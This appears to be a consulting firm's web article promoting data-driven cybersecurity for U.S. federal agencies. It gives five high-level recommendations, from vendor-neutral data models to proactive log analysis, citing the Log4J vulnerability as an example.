Back

Outpace Threats with Data-Driven Cybersecurity

What is Data-Driven Cybersecurity?

Here’s the good news: Organizations can overcome information overload. Adopting data-driven cybersecurity is about figuring out how to extract, normalize, and apply data to accelerate security operations—ideally faster than adversaries. Analytics and AI technology can help the government obtain a holistic view of the federal cybersecurity ecosystem

Along the way, agencies may need to leverage outside technical expertise. In the survey, most respondents (60%) said they had limited knowledge of cyber data analytics. And respondents were roughly split on whether they had limited or substantial knowledge of cyber-focused AI and ML. Respondents included mostly federal and military personnel, as well as stakeholders in think tanks, non-governmental organizations, lobbying roles, and the legislative branch. 

Data-driven cybersecurity, bounded by strategic business objectives, leverages talent and technology to deliver value across entire organizations—for instance, by equipping various internal teams with shared awareness of vital data. This requires a culture change, which is enabled, in part, by an integrated approach that lets security functions jointly overcome challenges with the right capabilities, management, and architecture tailored to fit the organization.

This approach integrates high volumes of disparate data from formerly siloed groups—for instance, teams focused on cyber operations, incident response, cyber intelligence, information protection services, security and investigations, legal, communications, and compliance issues. With use cases and data governance guided from the top, these teams are more empowered to make the real-time decisions needed to carry out critical missions and counter emerging threats. Operating with a clear vision also reduces the alert churn for security teams.

In addition, this approach makes it more cost-effective to store massive quantities of cybersecurity data for longer periods, which lets organizations gain the benefits of security analytics at scale in real time. And this, in turn, can enable advanced cybersecurity that uses predictive analytics and turns threat intelligence into actionable insights. 

What Are the Next Steps?

The Cybersecurity and Infrastructure Security Agency (CISA) should take the lead in operationalizing data from agencies and federal sensors to supply intelligence for proactive cyber defense operations. Fortunately, CISA is increasingly focused on conducting persistent hunts for threat activity, ingesting and analyzing security data at all levels of the network, and conducting rapid analysis to spot and counter threats.

In addition, all FCEB agencies and critical infrastructure entities should embrace data-driven cybersecurity. Here are five recommendations for putting this approach into action:

  • Commit to being vendor neutral: Every vendor is trying to lock you into their system. The best way to break out of that is to make all data go through an open architecture. To that end, CISA should look to develop and implement a common data model—for instance, for all endpoint detection and response (EDR) data. 
  • Assess internal needs: Organizations should conduct an analysis and make the data available to whoever needs to consume it. Data access should be controlled centrally. Along the way, agencies lacking knowledge in cyber data analytics and cyber-focused AI and ML should leverage expertise from elsewhere in government or in the private sector. 
  • Plan phased improvements: Organizations can begin with basic capabilities and then upgrade to advanced and leading capabilities over time. Leading organizations can work toward implementing the architecture for a cloud-native, cyber-focused data pipeline for streaming analytics (threat hunt, detection, and compliance). 
  • Act locally, think strategically: The more headway organizations make in overcoming their own silos, the better they will be able to contribute to the cybersecurity of the broader ecosystem. As National Cybersecurity Director Chris Inglis has noted, the collaborative development of insights across silos and stovepipes is increasingly important for the benefit of all.
  • Prepare now for the next threat: Organizations need to start moving ahead of threats—and the best way to do that is to proactively ready data to be analyzed and queried. Data must be normalized and made accessible. With each new threat, different datasets have become more valuable. In the case of Log4J vulnerabilities, for example, organizations could have been querying their application and firewall logs for potential attacks while they waited for vendors to self-identify and issue patches, or for vulnerability scanners to update their definitions. Being proactive is even more important when organizations must protect cloud-based systems and federated networks.
In short, data-driven cybersecurity is a national imperative. Data is the linchpin for full-spectrum U.S. cyber capabilities designed to defend the nation and counter threats. Embracing a data-driven approach can drive advancements in cyber threat huntingcyber threat information sharingsupply chain securityzero trust, and beyond. It’s never been more important for government agencies and critical infrastructure entities to embark on this path.

Learn More About Our Cybersecurity Solutions